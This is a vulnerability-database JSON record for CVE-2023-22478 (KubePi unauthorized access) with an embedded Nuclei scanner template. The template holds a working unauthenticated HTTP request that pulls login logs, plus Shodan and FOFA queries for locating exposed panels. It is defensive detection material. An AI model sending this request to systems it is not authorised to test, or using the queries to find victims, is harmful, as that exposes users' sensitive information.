{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-22478/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-22478/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-22478/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-22478/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-22478/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-22478"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-22478"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-22478.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-22478\n\ninfo:\n  name: KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n  impact: |\n    An attacker can gain unauthorized access to sensitive information.\n  remediation: |\n    Upgrade KubePi to a version higher than v1.6.4 to mitigate the vulnerability.\n  reference:\n    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-22478\n    - https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4\n    - https://github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6\n    - https://github.com/KubeOperator/KubePi/releases/tag/v1.6.4\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-22478\n    cwe-id: CWE-862\n    epss-score: 0.03573\n    epss-percentile: 0.88871\n    cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: fit2cloud\n    product: kubepi\n    shodan-query:\n      - html:\"kubepi\"\n      - http.html:\"kubepi\"\n    fofa-query:\n      - \"kubepi\"\n      - body=\"kubepi\"\n  tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout 10\n        POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"apiVersion\":'\n          - '\"uuid\":'\n          - '\"userName\":'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502202d6ab70bc66e4f6c78b958cf7be1178ce7a3e033f97a03d301b15a72b4874428022100a6a55390b2c2dc18867d22ea71ae986a8a674a27f97a58679c1e2f44e1e53762:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-22478"
}